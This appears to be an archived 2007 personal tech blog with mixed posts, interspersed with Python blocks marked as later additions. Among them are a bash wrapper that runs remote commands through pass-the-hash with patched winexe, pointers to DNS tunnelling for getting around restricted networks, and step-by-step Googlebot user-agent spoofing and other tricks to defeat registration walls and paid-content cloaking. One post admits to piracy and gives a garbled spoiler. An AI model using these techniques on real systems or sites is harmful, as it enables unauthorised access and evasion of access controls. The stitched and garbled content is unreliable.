# Thursday, July 26, 2007

So some people really started to bust loose with the out-of-the-box thinking on this one. You know how you will hit some networks where you can only get DNS out, like wifi spots, guest networks, NAC subnets? Here is a little trick to get access to resources by using UDP/53; add that to your pentest. The first link has the source, a step-by-step, the hosting service and a video on how to work it; the other two are just follow-up info.

skript kiddy help for DNS tunnel

description with code sample for the dns tunnel

full how to dns tunnel

posted on Thursday, July 26, 2007 10:54:50 AM (Pacific Daylight Time, UTC-07:00)  #    Comments [1] Trackback

yes, recover deleted files from PST

  1. To corrupt the PST file, open it with a hex editor.
  2. Clear positions 7 through 13 with the spacebar. Since the editor uses hexadecimal numbering, this actually clears 13 characters, at the following positions:
     00007, 00008, 00009, 0000a, 0000b, 0000c, 0000d, 0000e, 0000f, 00010, 00011, 00012, 00013
     (The editor displays the code “20” each time you clear a position with the spacebar.)
  3. After clearing those positions in the file, save it. Your PST is now corrupted.
  4. Run the Inbox Repair Tool, SCANPST.exe, to recover the file. On Win2K and WinNT systems, the executable is located in For additional information on the Inbox Repair Tool, see Microsoft Knowledge Base article 287497.
  5. After creating a backup, the Inbox Repair Tool repairs the damage and recreates the PST. Open the new PST in Outlook. The Deleted Items folder should contain all removed messages, so anything you've emptied will be restored.
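The hex-editor step as a script, added here as an example (not code from the original post): it works on a copy so the original PST is never touched, uses the post's offsets (0x07..0x13, 13 bytes) and fill byte (0x20), and refuses files that do not start with the PST header magic "!BDN".

```python
# Added example: reproduce the post's hex-editor edit on a COPY of a PST,
# then hand the copy to SCANPST.EXE. Offsets are the post's hex positions.
import shutil
import sys
from pathlib import Path

PST_MAGIC = b"!BDN"        # every PST header starts with these four bytes
FIRST, LAST = 0x07, 0x13   # the post's "positions 7 through 13" are hex offsets
FILL = 0x20                # what a hex editor writes when you press the spacebar

def blank_header_range(data: bytes) -> bytes:
    """Return a copy of data with offsets FIRST..LAST (13 bytes) set to FILL."""
    if len(data) <= LAST:
        raise ValueError("input too short to hold a PST header")
    if data[:4] != PST_MAGIC:
        raise ValueError("not a PST file: !BDN magic missing")
    buf = bytearray(data)
    for off in range(FIRST, LAST + 1):
        buf[off] = FILL
    return bytes(buf)

def changed_offsets(before: bytes, after: bytes) -> list:
    """Offsets at which two equal-length buffers differ (to verify the edit)."""
    return [i for i, (a, b) in enumerate(zip(before, after)) if a != b]

def corrupt_copy(src: Path) -> Path:
    """Leave the original untouched: write <name>.corrupt.pst beside it."""
    dst = src.with_suffix(".corrupt.pst")
    shutil.copy2(src, dst)
    # only the first 20 bytes change, so patch in place instead of reading it all
    with open(dst, "r+b") as f:
        head = f.read(LAST + 1)
        f.seek(0)
        f.write(blank_header_range(head))
    return dst

if __name__ == "__main__":
    out = corrupt_copy(Path(sys.argv[1]))
    print(f"wrote {out}; now run SCANPST.EXE against it and keep the original")
```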
posted on Thursday, July 26, 2007 9:41:21 AM (Pacific Daylight Time, UTC-07:00)  #    Comments [0] Trackback
# Wednesday, July 25, 2007
Is this legal? Either way, it's a hack. frog automation
posted on Wednesday, July 25, 2007 1:37:04 PM (Pacific Daylight Time, UTC-07:00)  #    Comments [0] Trackback
# Monday, July 16, 2007
I have swiped a copy of the audio book from BitTorrent and cheated and skipped ahead to the last 30 mins. All the hype about who died: it was Tony Soprano they killed, at about 27 min to the end of the book (audio). Boring, totally saw that coming.
posted on Monday, July 16, 2007 9:40:27 AM (Pacific Daylight Time, UTC-07:00)  #    Comments [0] Trackback
# Friday, July 13, 2007

I got my first corporate Vista box today, I'm not that impressed. It's a lot of ho-hum slow GUI mess if you ask me. Yes, you can change Vista to look like XP again and use all the normal Windows 2000 GUI look and feel, but it's just slow; the hard disk is always doing something. More importantly, for some reason IPv6 is running and my network isn't a fan of it on the PC. I don't know why and I don't have time to figure it out, but I do know how to shut it off. Problem solved from my end.

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters]
"DisabledComponents"=dword:000000ff

And if you want to back out that change, either delete 'DisabledComponents' or set it to 0.
If you are curious what each bit of the DWORD does, here you go:

0x00000001 - Disable all tunnel interfaces
0x00000002 - Disable 6to4
0x00000004 - Disable ISATAP
0x00000008 - Disable Teredo
0x0000000A - Disable Teredo and 6to4
0x00000010 - Disable all LAN and PPP interfaces
0x00000011 - Disable all LAN, PPP, and tunnel interfaces
0x00000020 - Prefer IPv4 over IPv6
0x000000FF - Disable IPv6 over all interfaces and prefer IPv4 to IPv6
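A small decoder for that DWORD, added here as an example (not from the original post): it pulls the value out of a .reg line like the one above, names the bits using the table's wording, and flags bits the table does not name (0xFF also sets 0x40 and 0x80, which the table leaves undescribed), so you can tell what a value found on a machine actually turns off before importing or copying it.

```python
# Added example: decode / compose the DisabledComponents bitmask from the post.
import re

BITS = {
    0x01: "Disable all tunnel interfaces",
    0x02: "Disable 6to4",
    0x04: "Disable ISATAP",
    0x08: "Disable Teredo",
    0x10: "Disable all LAN and PPP interfaces",
    0x20: "Prefer IPv4 over IPv6",
}
REG_LINE = re.compile(r'^"DisabledComponents"=dword:([0-9a-fA-F]{8})$')

def parse_reg_line(line: str) -> int:
    """Read the value out of a '"DisabledComponents"=dword:000000ff' line."""
    m = REG_LINE.match(line.strip())
    if not m:
        raise ValueError(f"not a DisabledComponents dword line: {line!r}")
    return int(m.group(1), 16)

def decode(value: int) -> list:
    """Name each set bit; bits outside the table are reported, not hidden."""
    effects = [name for bit, name in BITS.items() if value & bit]
    unnamed = value & ~sum(BITS)          # sum of the keys = mask of known bits
    if unnamed:
        effects.append(f"unnamed bits 0x{unnamed:02X} (not in the post's table)")
    return effects

def compose(*names: str) -> int:
    """Combine named behaviours into one DWORD, e.g. 6to4 + Teredo -> 0x0A."""
    lookup = {name: bit for bit, name in BITS.items()}
    return sum(lookup[n] for n in names)

def reg_line(value: int) -> str:
    """Render a value in .reg syntax, matching the post's snippet."""
    return f'"DisabledComponents"=dword:{value:08x}'

if __name__ == "__main__":
    value = parse_reg_line('"DisabledComponents"=dword:000000ff')
    for effect in decode(value):
        print(effect)
    print(reg_line(compose("Disable 6to4", "Disable Teredo")))
```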

posted on Friday, July 13, 2007 3:50:18 PM (Pacific Daylight Time, UTC-07:00)  #    Comments [0] Trackback

I have made a script to demo the use of winexe with the pass-the-hash patch. This script is nothing more than a quick-entry bash script to demo in front of people so they don't have to know the Linux command line to understand what is happening.

#!/bin/bash
# Name: hash_pass
# Version: .01
# Demo wrapper for the pass-the-hash patched winexe: the patched Samba
# libraries read the hash from the SMBHASH environment variable, so the
# password handed to -U ("foo") is a dummy that is never used.

echo ""
echo "Demo of pass-the-hash with SMB and an NT/LM hash"
echo ""
echo -n "paste hash in format LM_HASH:NTLM_HASH : "
read -r hsh
export SMBHASH="$hsh"
echo -n "username and domain in format DOMAIN/user (note: / not \\): "
read -r usid
echo -n "hostname or IP for use of resource: "
read -r hst
echo -n "command to run on host ex. cmd.exe: "
read -r comnd
# quote each argument so hosts or commands containing spaces stay intact
./winexe -U "$usid%foo" "//$hst" "$comnd"

posted on Friday, July 13, 2007 12:36:58 PM (Pacific Daylight Time, UTC-07:00)  #    Comments [0] Trackback
# Thursday, July 12, 2007

Now, there are a lot of tricks I don't know, but here are a few that were rather interesting and that I hadn't picked up in my years of emergency Linux support work.

apropos - search the whatis database for strings

whereis - locate the binary, source, and manual page files for a command on disk (adding -b will only give binary returns)

Alt + SysRq + B

If you're not running any crucial scheduled tasks or in the middle of composing a letter or an e-mail, then this key combination may be the one to use. It will reboot the system immediately without bothering to sync or unmount disks.

Alt + SysRq + R

If you cannot get to a terminal window by using Ctrl + Alt + F2, then use this key combination (pressed together) to get the keyboard back: it turns off what is called keyboard raw mode, so keyboard input works again even after your X session has crashed or frozen. Now try Ctrl + Alt + F2 again and you can shut down from the terminal. If that fails, move on to the next option.

Alt + SysRq + S

This key combo does just what it says on the tin: it (S)yncs all filesystems, which reduces the possibility of losing any data and may obviate the need for the system to run fsck upon reboot.

Alt + SysRq + U

As you might guess, this one tries to unmount disks and remount them as read only.

Alt + SysRq + O

Not so obvious, but this will power off your machine without syncing or unmounting disks (but it won't reboot).
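Whether any of the key combos above work depends on the kernel's /proc/sys/kernel/sysrq policy mask, so as an added example (not from the original post) here is a decoder for that mask, following Documentation/admin-guide/sysrq.rst: it reports which of B, R, S, U and O a box will honour from a keyboard. The sample mask values are constructed; read_live_mask() needs a real Linux /proc.

```python
# Added example: which magic SysRq keys does this host's policy allow?
# sysrq mask bit -> the magic keys from the post that it gates
MASK_BITS = {
    4:   ("R",),       # keyboard control (unraw, also SAK)
    16:  ("S",),       # sync
    32:  ("U",),       # remount read-only
    128: ("B", "O"),   # reboot / power off
}
ALL_KEYS = {"B", "R", "S", "U", "O"}

def allowed_keys(mask_text: str) -> set:
    """Subset of B/R/S/U/O the given sysrq mask permits."""
    mask = int(mask_text.strip())
    if mask == 0:
        return set()              # 0 = SysRq disabled completely
    if mask == 1:
        return set(ALL_KEYS)      # 1 = every function enabled
    return {k for bit, keys in MASK_BITS.items() if mask & bit for k in keys}

def console_risk(mask_text: str) -> list:
    """Plain-language summary of what physical keyboard access can trigger."""
    keys = allowed_keys(mask_text)
    notes = []
    if keys & {"B", "O"}:
        notes.append("unsynced reboot/power-off allowed (B, O)")
    if keys & {"S", "U"}:
        notes.append("sync / remount read-only allowed (S, U)")
    if "R" in keys:
        notes.append("keyboard unraw allowed (R): console regained after X hangs")
    return notes

def read_live_mask(path: str = "/proc/sys/kernel/sysrq") -> str:
    """Return the running kernel's mask text (Linux only)."""
    with open(path) as f:
        return f.read()

if __name__ == "__main__":
    # constructed samples: 176 = 16+32+128 (a common distro default),
    # 438 additionally allows unraw, log-level and RT-nicing control
    for sample in ("0", "1", "176", "438"):
        print(sample, sorted(allowed_keys(sample)), console_risk(sample))
```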

 

 

posted on Thursday, July 12, 2007 9:39:47 AM (Pacific Daylight Time, UTC-07:00)  #    Comments [0] Trackback
# Tuesday, July 10, 2007
Googled me today. Found a guy with a blog that looks like his (I say his because I use the theme he created), and I found a problem with IE7 and helped him fix it. Well, I post this because he has a good tech-nerd-IT blog just like me, so add his to your RSS.
posted on Tuesday, July 10, 2007 4:17:49 PM (Pacific Daylight Time, UTC-07:00)  #    Comments [0] Trackback
# Monday, July 09, 2007

The following trick will allow you to view some BBS services without having to register, and on some technical sites that require a log-in you might be able to access the data, so you don't need to have accounts all over the intertubes. When this gets banned, just switch to any of the other bots; see the last bit of the post for all the bot info I took from the dasBlog source code.

Alter your settings to the following:

User Agent: Googlebot/2.1
Compatible: http://www.googlebot.com/bot.html

You can do so in Opera with ease. Firefox offers an extension which is downloadable from the official website.

To set up the plugin, click on Add, then name your 'agent' something like "google" in the description text box. For the "User Agent" field, put this: Googlebot/2.1 (http://www.googlebot.com/bot.html)

Save it; then, to access the plugin, go to Tools (next to Help on the menu bar in Firefox), mouse over Agent Switcher, select google, and surf away. A word of warning: some sites will ban you if they do an IP range check or a reverse DNS check and your IP doesn't match that of their stored Googlebot IP addy or DNS.

For Internet Explorer you need to change registry entries.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]
@="Googlebot/2.1"
"Compatible"="+http://www.googlebot.com/bot.html"

Save this as bot.reg and execute.

To revert the changes back, you need the following:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]
@="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

Save as nobot.reg and execute.

<UserAgents>
  <string>msnbot-Products/1.0 (+http://search.msn.com/msnbot.htm)</string>
  <string>MJ12bot/v1.0.8 (http://majestic12.co.uk/bot.php?+)</string>
  <string>ISC Systems iRc Search 2.1</string>
  <string>ichiro/2.0 (http://help.goo.ne.jp/door/crawler.html)</string>
  <string>Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)</string>
  <string>asterias/2.0</string>
  <string>www.adressendeutschland.de</string>
  <string>NutchCVS/0.7.1 (Nutch; http://lucene.apache.org/nutch/bot.html; raphael@unterreuth.de)</string>
  <string>Snapbot/1.0</string>
  <string>msnbot/1.0 (+http://search.msn.com/msnbot.htm)</string>
  <string>Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)</string>
  <string>Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)</string>
  <string>RufusBot (Rufus Web Miner; http://64.124.122.252/feedback.html)</string>
  <string>Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)</string>
  <string>Gigabot/2.0/gigablast.com/spider.html</string>
  <string>TurnitinBot/2.0 http://www.turnitin.com/robot/crawlerinfo.html</string>
  <string>Mozilla/5.0 (compatible; BecomeBot/3.0; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)</string>
  <string>Sphere Scout&amp;v4.0 (beta) - scout at sphere dot com</string>
  <string>Gigabot/2.0; http://www.gigablast.com/spider.html</string>
  <string>msnbot/0.9 (+http://search.msn.com/msnbot.htm)</string>
</UserAgents>

So, how do you beat all 5 major types of cloaking?

1. Beat IP Delivery: Use Google Translate as a proxy, translating from Spanish->English even though the site is already in English.
2. Beat User-Agent Cloaking: Use the Firefox User-Agent Switcher to spoof as GoogleBot.
3. Beat Javascript Detection: Use the Firefox Web Developer Toolbar to turn off JavaScript.
4. Beat Cookie Detection: Use the Firefox Web Developer Toolbar to turn off cookies.
5. Beat Referer Detection: Use the Firefox RefControl extension to prevent the referer from being sent.

Using these in conjunction can be extremely effective, even at pay-for-information sites.
Doing this may be against the terms of service of the site you are visiting. There are plenty of popular sites out there that cloak content which is normally only available to paying members. While these techniques work on those sites too, be careful.

Good browsing!

posted on Monday, July 09, 2007 10:53:28 PM (Pacific Daylight Time, UTC-07:00)  #    Comments [0] Trackback
I upgraded to the newest build of dasBlog over the weekend. Being that this was also July 4th weekend, I thought I would post that I did not blow up my hand this year. I also am trying to fix the database that spammers ruined on the gallery, so the pictures should be back online soon.
posted on Monday, July 09, 2007 11:08:03 AM (Pacific Daylight Time, UTC-07:00)  #    Comments [0] Trackback